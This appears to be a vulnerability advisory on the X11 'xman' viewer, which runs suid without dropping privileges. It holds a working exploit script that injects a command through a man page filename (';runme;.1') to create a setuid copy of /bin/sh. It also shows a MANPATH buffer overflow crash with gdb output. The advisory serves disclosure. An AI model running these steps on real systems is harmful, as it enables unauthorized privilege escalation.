COMMAND
xman
SYSTEMS AFFECTED
xman
PROBLEM
'Vde79' found following. xman doesn't drop privileges anywheres
in the program, but does support suid installation. So,
exploiting via a system call is much easier than the buffer
overflow in MANPATH, mentioned in some earlier advisories. Here
is an example of such an exploitation possibility:
#!/bin/sh
# example of xman exploitation. xman
# supports privileges. but, never
# drops them.
# Vade79 -> v9@realhalo.org -> realhalo.org.
MANPATH=~/xmantest/
mkdir -p ~/xmantest/man1
cd ~/xmantest/man1
touch ';runme;.1'
cat << EOF >~/xmantest/runme
#!/bin/sh
cp /bin/sh ~/xmansh
chown `id -u` ~/xmansh
chmod 4755 ~/xmansh
EOF
chmod 755 ~/xmantest/runme
echo "click the ';runme;' selection," \
"exit. then, check for ~/xmansh."
xman -bothshown -notopbox
rm -rf ~/xmantest
'KF'added following. xman from at least
X11R6-contrib-3.3.2-3.i386.rpm suffers from a classic overflow.
[root@linux lib]# ls -al `which xman`
-rwxr-sr-x 1 root man 41076 Jun 17 1998
/usr/X11R6/bin/xman*
[root@linux lib]# xman
[root@linux lib]# export MANPATH=`perl -e 'print "A" x 7000'`
[root@linux lib]# xman
Xman Error: Could not allocate memory for manual sections.
[root@linux lib]# export MANPATH=`perl -e 'print "A" x 70000'`
[root@linux lib]# xman
Segmentation fault
[root@linux lib]# gdb xman
GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0
(gdb) run
Starting program: /usr/X11R6/bin/xman
0x4022fb66 in getenv () from /lib/libc.so.6
(gdb) bt
#0 0x4022fb66 in getenv () from /lib/libc.so.6
#1 0x0804bc47 in _start ()
#2 0x41414141 in ?? ()
Cannot access memory at address 0x41414141
(gdb) info registers
eax 0xbffee784 -1073813628
ecx 0x804fb29 134544169
edx 0x805414c 134562124
ebx 0x40328f2c 1077055276
esp 0xbffec6fc 0xbffec6fc
ebp 0xbffec714 0xbffec714
esi 0x6 6
edi 0x41414141 1094795585
eip 0x4022fb66 0x4022fb66
SOLUTION
Nothing yet.